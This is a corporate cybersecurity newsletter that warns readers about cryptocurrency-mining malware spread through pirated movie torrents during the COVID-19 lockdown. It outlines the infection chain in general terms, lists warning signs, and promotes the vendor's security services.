cyber security newsletter 3

COVID-19 Cyber Threats: CoinMiner Malware

By now a third of the global population is on lockdown due to the COVID-19 pandemic which caused a lot of people to be trapped in their homes for more than a month.

South Africa experienced a 15% increase in Internet traffic across SEACOM’s, the operator of one of South Africa’s major undersea fibre cables, network since March 2020.1

There’s many people who are unable to work from home and even those who are able to, have to keep their kids busy and then there’s evenings and weekends where everyone is stuck in their homes. You can clean the house, mow the lawn and play dress up (or WWE smackdown for those with boys) for just so long.  For many, the television turned out to be a saving grace.

While some people are subscribed to legal streaming sites or DSTV there are still a lot of people who get their movie and TV show content from torrents and pirate streaming sites even though it is illegal and may subject a person to civil and criminal liability.

Cyber attackers have been using these torrents to distribute malware for a long time, but it is happening even more now, during the lockdown. Microsoft Security Intelligence discovered that some of these malware install and run CoinMiners. 

Cryptocurrency miners (Coinminers) are programs that generate Bitcoin, Monero, Ethereum, or other cryptocurrencies.

CoinMiner Malware use someone else's computer’s/device’s resources (CPU, GPU, RAM, network bandwidth, and power) to dig up and force it to mine cryptocurrencies.

Even though downloading pirated content is the main way how users can get infected with CoinMiner malware, there are a variety of other ways as well, such as via fake updates, third-party software installers, etc. When you download a movie, you can also be downloading  ZIP files, which runs a VBScript. “The VBScript runs a command line that uses BITSAdmin to download more components, including an AutoIT script, which decodes a second-stage DLL. The in-memory DLL then injects a coin-mining code into notepad.exe through process hollowing,” says Microsoft. 2

While cybercriminals profit from this activity, victims have to suffer from lag, errors, system crashes, overheating issues, as well as increased electricity bills.

Indications that your computer is mining include high CPU and GPU usage, overheating, crashes, slow response times or unusual network activity. 3 Everyone should have a security solution on their computer and devices which need to be active at all times. 


Not sure whether your computer is secure?

Contact LAWtrust regarding systems and services that can assist in making you more secure while working from home.


Notes
1 Vermeulen, J. (2020, April 5). How much Internet traffic in South Africa has increased due to the coronavirus. https://mybroadband.co.za/news/internet/344937-how-much-internet-traffic-in-south-africa-has-increased-due-to-the-coronavirus.

 
2 Stahie,S. (2020, April 30). Pirated Movies Are Used to Distribute Malware. https://securityboulevard.com/2020/04/pirated-movies-are-used-to-distribute-malware/.

3 (2019, November 19). Protection against the Coinminer malware. https://support.norton.com/sp/en/us/home/current/solutions/v125881893.